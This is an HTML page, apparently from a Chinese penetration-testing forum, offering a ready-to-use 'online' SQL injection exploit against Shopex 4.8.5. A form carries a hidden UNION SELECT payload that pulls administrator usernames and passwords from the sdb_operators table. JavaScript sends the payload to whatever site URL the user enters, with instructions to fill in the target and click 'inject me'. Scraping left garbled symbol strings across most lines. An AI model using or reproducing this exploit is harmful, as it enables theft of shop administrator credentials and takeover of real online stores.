<center># C4 C2 K% g9 `6 z' v
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
; ~, M( K3 q' \<form action="" method="post" name="submit_url">+ N9 V( M$ I% ?8 V+ G/ q! W. D. v% d
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
( T% I$ R( Z. f( N. @( m<input type="hidden" name="goods[goods_id]" value="3">
2 P0 E$ T; w! e w; Y$ p& t<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">! P( F: S* Y( [4 ?$ N
<input type="submit" value="给我注入" onclick=fsubmit()>
0 z/ w, B* }, m1 y</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
, R5 |8 N/ ^( |" E6 x
8 \) P1 K5 w0 w: Y5 q3 T! `: V<script>
" r+ _0 U( I$ afunction fsubmit(){ . ^+ @% d) i" F. I9 E) k
form = document.forms[0];
7 j. `# U* Y. a2 \ X" Q- @! C; lform.action = form.url.value+'/?product-gnotify'; ) C3 H3 {# K K9 [$ \) y2 Y) |* K% Q
form.submit(); % P6 Q" a: Q H! P
} 9 V5 V+ g7 o8 e( n! @
</script>- C$ Z% ?, l4 B- H6 b) H9 e# ?* [
|